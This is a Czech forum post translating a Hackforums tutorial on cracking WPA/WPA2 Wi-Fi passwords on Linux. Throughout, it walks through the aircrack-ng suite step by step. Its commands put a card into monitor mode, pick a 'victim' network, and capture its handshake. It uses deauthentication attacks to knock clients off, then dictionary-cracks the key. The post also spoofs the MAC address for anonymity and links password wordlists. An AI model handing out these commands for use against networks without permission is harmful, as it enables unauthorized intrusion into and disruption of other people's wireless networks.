Návody a rady na všechno možné
1 příspěvek • Stránka 1 z 1

WPA/WPA2 hack - linux

Návody a rady na všechno možné
Uživatelský avatar
Kolcek
V.I.P
Bydliště: vinný sklípek :D
Dal poděkování: 9 poděkování
Dostal poděkování: 27 poděkování
Příspěvky: 1280
Registrován:10 črc 2008 14:28
Odesláno:05 led 2010 12:15

WPA/WPA2 hack - linux

!!!ČLÁNEK NENÍ MŮJ POUZE JSEM HO PŘEKLÁDAL A S DOVOLENÍM AUTORA HO TADY PUBLIKUJI!!! AUTOR JE Qkyrie A NÁVOD JSEM PŘEKLÁDAL Z HACKFORUMS!!! DOKAZ NA ORIGINÁL JE NA KONCII ČLÁNKU!!!

Tento a všechny ostatní články autora můžete nalézt také na

Kód: Vybrat vše

http://www.secusoft.be
Zdravím všechny, tady Qkyrie z The Dark Brotherhood ;-)
Nedávno jsem si všiml zvláštní věci tady na fóru, všichni mají rádi WEP-cracking tutorialy, ale spousta lidí se ptá také na otázky ohledně WPA/WPA2 crackingu. Po těchto zjištěních jsem si všiml, že tu nebyly žádné tutorialy, které by se tímto zabývaly. Nebo jsem špatně hledal, to je druhá možnost :D.

Znalosti

Když se podíváte na útok pozorně, budete si myslet, že cracknout WPA bylo velice snadné. Někteří říkají, že to taky je a někteří, že ne. Pravdou je, že jestli je heslo v nějakém slovníku, pak může být cracknuto. Jen pro pořádek: Když se crackuje WPA2, tak je to stejné ;-).

Budete potřebovat "4-way handshake" od klienta připojujícího se na AP(to 4-way handshake nevim jak přeložit). "4way handshake" obsahuje šifrovaný algoritmus, který může být cracknut slovníkovým útokem. Budete potřebovat velký slovník a trochu štěstí, aby to heslo bylo ve slovníku. Nebo si můžete vytvořit vlastní slovník pomocí nějakého password toolu, který se vám líbí(jako john the ripper), o který se tento tutorial nebude starat ;-). Pro tento tutorial budu samozřejmě používat Aircrack-ng

!Volitelně:"zjednodušení"

Kód: Vybrat vše

sudo su
Budete potřebovat rootovská práva, pro spouštění těchto aplikací. Například pokud používáte Ubuntu and nechcete psát "sudo" na začátku každého řádku, tak můžete použít tento volitelný příkaz.

Seznámení se s interface

zaprvé potřebujete vědět název wifi rozhraní. Zjistíte to napsáním

Kód: Vybrat vše

iwconfig
Obrázek
Například u mě je název rozhraní wlan0, a jak můžete vidět, tak je to to jediný co se může někam připojit..

Určení oběti

Kód: Vybrat vše

airmon-ng start INTERFACE
měli byste dostat malou zprávu, ve které bude
(monitor mode enabled on SPOOFEDINTERFACE ) //v mém případě SPOOFEDINTERFACE bylo "mon0"..

Kód: Vybrat vše

airodump-ng SPOOFEDINTERFACE
Další krok bude výběr vaší oběti. Samozřejmě teď budeme hledat někoho s WPA šifrováním.
Až si vyberet někoho s WPA, tak si napište jeho BSSID a CHANNEL.
Obrázek
Restartování síťové karty pro vstup do správného kanálu

Kód: Vybrat vše

airmon-ng stop SPOOFEDINTERFACE

Kód: Vybrat vše

airmon-ng start INTERFACE CHANNEL
Začátek ukládání souboru

Kód: Vybrat vše

airodump-ng -c CHANNEL --bssid BSSID -w psk SPOOFEDINTERFACE
Tohle zapne airodump-ng na vybraném kanálu (-c). Bude to hledat "handshakes" vybraného BSSID and bude je to ukládat do souboru pojmenovaného psk (-w).

POZOR! Můžete se zeptat sami sebe - Jak poznám, kdy mám "handshake"?
-> Aircrack na tohle myslel, a když získáte "handshake", tak se zobrazí zpráva v pravém horním rohu
Obrázek



!Volitelné, ale pomůže to zrychlit získání "handshake"

Vy potřebujete dostat "handshake", ale lidé co jsou připojení ji samozřejmě nebudou rozdávat. K tomu dochází jen při ověření. Kdybychom je mohli na chviklu vyhodit z jejich sítě, aby se museli znovu připojit, tak by to bylo perfektní!

Kód: Vybrat vše

aireplay-ng -0 10 -a BSSID -c CLIENTBSSID SPOOFEDINTERFACE
Tohle udělá 10 "deauthentication" útoků (-0), kde AP je BSSID a klient, který je přihlašován je CLIENTBSSID.

Můžete zkontrolovat jestli je klient připojený, když se znovu podíváte do Airodump-ng. Jestli vidíte na spodu obrazovky, že se někdo připojil na ESSID vaší oběti, tak jednoduše použijte STATION BSSID jako CLIENTBSID v tomto příkladu

Kód: Vybrat vše

aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
Tohle crackne soubor s nasbíranými daty, který byl vytvořen v airodump-ng.
pozor! O crack se můžete pokusit jen, když už máte "handshake".

Nezapomeńte, -w potřebuje cestu k vašemu wordlistu, takže si pamatujte, kde jste ho uložili!
Obrázek
-> Aircrack-ng při pokusu o crack hesla

!Volitelné:"bezpečnost"

Jako sript kiddy(tohle je mezinárodní výraz, kterej se nepřekládá, označuje ty co si hrajou na hackery pomocí předpřipravených programů.-pozn. překladatele), můžete chtít být v anonymitě, takže tady je návod, jak si změníte svoji mac..
Zkuste to udělat sami ;-)

Kód: Vybrat vše

sudo ifconfig SPOOFEDINTERFACE down && sudo macchanger -r INTERFACE && sudo macchanger -r SPOOFEDINTERFACE && ifconfig SPOOFEDINTERFACE up
Wordlisty

Jestli budete potřebovat nějaký dobrý wordlisty, tak se prvně podívejte tady:

Kód: Vybrat vše

http://theargon.com/achilles/wordlists/theargonlists/

Bye

díky za váš čas ;-)

Originál k nalezení na

Kód: Vybrat vše

http://adf.ly/G2F
V.I.P
1 příspěvek • Stránka 1 z 1